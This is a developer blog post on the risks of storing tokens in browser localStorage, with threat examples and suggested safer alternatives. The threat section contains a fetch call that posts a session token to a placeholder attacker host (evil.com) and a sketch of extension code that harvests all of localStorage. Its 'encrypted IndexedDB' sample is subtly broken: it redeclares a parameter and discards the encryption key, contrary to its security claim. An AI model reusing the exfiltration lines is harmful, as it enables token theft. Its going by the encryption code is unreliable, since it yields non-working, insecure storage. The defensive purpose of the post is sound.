DEV Community

Cover image for Concerned About localStorage? Here's How to Secure It
Gouranga Das Samrat
Gouranga Das Samrat

Posted on

Concerned About localStorage? Here's How to Secure It

localStorage Got You Worried? Here’s How to Lock It Down

I’ve been storing sensitive data in localStorage, thinking it’s safe and convenient. It’s not. One mistake could expose everything: user tokens, private keys, you name it.

Storing sensitive data in localStorage is like leaving your house key under the doormat. It’s easy to access, sure, but it’s a disaster waiting to happen.

Why localStorage Is a Trap

localStorage seems like a dream — simple key-value storage right in the browser. You set a value, it persists, and you retrieve it later.

localStorage.setItem("userToken", "super-secret-token");
Enter fullscreen mode Exit fullscreen mode

It’s accessible to any script running on your page. It’s like a vault with no lock.

Threat #1: Cross-Site Scripting (XSS) Attacks

Malicious scripts can sneak into your app through user inputs or untrusted third-party libraries.

They can read localStorage with a single line of code.

const stolenToken = localStorage.getItem("userToken");
Enter fullscreen mode Exit fullscreen mode

A 2023 report from OWASP flagged XSS as a top web vulnerability, with 53% of apps tested showing exploitable flaws.

Imagine a hacker grabbing your user’s session token.

fetch("https://evil.com/steal", {
  method: "POST",
  body: localStorage.getItem("userToken"),
});
Enter fullscreen mode Exit fullscreen mode

Your users’ trust crumbles overnight.

Threat #2: Third-Party Script Vulnerabilities

You include a popular analytics script or a shiny new UI library.

If it’s compromised, it can access localStorage too.

// Compromised third-party script
console.log(localStorage.getItem("userToken")); // Sends it somewhere bad
Enter fullscreen mode Exit fullscreen mode

Modern apps often load dozens of external scripts. A single breach in one library can leak everything. You can’t predict which script will turn rogue.

Threat #3: Browser Extension Exploitation

Browser extensions can sneak scripts into your web pages and raid localStorage.

Most extensions are legit, but some turn rogue or get hacked.

// Sneaky extension code
const observer = new MutationObserver(() => {
  // Grab all localStorage data
  const data = { ...localStorage };
  // Ship it to a shady server
  chrome.runtime.sendMessage({
    type: "STOLEN_DATA",
    payload: data,
  });
});
observer.observe(document, { subtree: true, childList: true });
Enter fullscreen mode Exit fullscreen mode

The chrome.runtime API lets extensions talk to their components, handling service workers, lifecycle events, or path conversions.

The observe() method sets up MutationObserver to watch for DOM changes matching your settings.

This is why localStorage is a risky spot for sensitive data, one bad extension can expose everything.

Safer Ways to Store Sensitive Data

Switch to safer storage options to protect your users.

🔒 Option 1: HttpOnly Cookies

Cookies with the HttpOnly flag can’t be accessed by JavaScript. They’re sent securely to your server with every request.

// Server-side: Set a secure cookie
res.cookie("refresh_token", refreshToken, {
  httpOnly: true, // JavaScript can't access
  secure: true, // HTTPS only
  sameSite: "strict", // Prevents CSRF
  path: "/api/refresh", // Scope to specific endpoints
});
Enter fullscreen mode Exit fullscreen mode

You’ll need to manage server-side validation.

🔒 Option 2: sessionStorage

sessionStorage is like localStorage but clears when the tab closes.

It’s a short-term vault for sensitive data. The main advantage of sessionStorage is that you can enforce it’s lifetime. The data is cleaned up automatically which reduces the risk of sensitive data leaks.

const sessionManager = {
  storeTemporaryData(key, value) {
    sessionStorage.setItem(
      key,
      JSON.stringify({
        value,
        timestamp: Date.now(),
        expiresIn: 30 * 60 * 1000, // 30 minutes
      })
    );
  },
  getTemporaryData(key) {
    const data = sessionStorage.getItem(key);
    if (!data) return null;
    const { value, timestamp, expiresIn } = JSON.parse(data);
    // Auto-expire old data even within the session
    if (Date.now() - timestamp > expiresIn) {
      sessionStorage.removeItem(key);
      return null;
    }
    return value;
  },
  refreshData(key) {
    const data = this.getTemporaryData(key);
    if (data) {
      this.storeTemporaryData(key, data); // Reset expiration
    }
    return data;
  },
};
Enter fullscreen mode Exit fullscreen mode

It’s perfect for single-session data like form drafts.

🔒 Option 3: Encrypted IndexedDB

IndexedDB with encryption offers robust storage for complex apps. It allows you to store complex data structure, binary data, and can be used as an efficient encrypted data storage. It’s great for offline-first applications that caches sensitive data.

const secureStore = {
  async encrypt(data) {
    // Generate a unique encryption key using Web Crypto API
    const key = await crypto.subtle.generateKey(
      { name: "AES-GCM", length: 256 },
      true,
      ["encrypt", "decrypt"]
    );
    // Convert data to buffer for encryption
    const encoder = new TextEncoder();
    const dataBuffer = encoder.encode(JSON.stringify(data));
    // Generate a random IV for each encryption
    const iv = crypto.getRandomValues(new Uint8Array(12));
    // Encrypt the data
    const encryptedData = await crypto.subtle.encrypt(
      { name: "AES-GCM", iv },
      key,
      dataBuffer
    );
    return {
      encrypted: encryptedData,
      iv,
      key,
    };
  },
  async store(key, value) {
    const db = await openDB("secureStore", 1, {
      upgrade(db) {
        // Create store with indexes if needed
        db.createObjectStore("encrypted", { keyPath: "id" });
      },
    });
    const { encrypted, iv, key } = await this.encrypt(value);
    // Store encrypted data with metadata
    await db.put("encrypted", {
      id: key,
      data: encrypted,
      iv,
      timestamp: Date.now(),
    });
  },
};
Enter fullscreen mode Exit fullscreen mode

You control the encryption keys, keeping data safe.

Final Takeaway

Pick the option that fits your app’s flow. Your users will feel secure. Your app will stand stronger.

Share your thoughts in the comment.

Follow me for more cool JavaScript nuggets.

Thank you for being a part of the community

Top comments (0)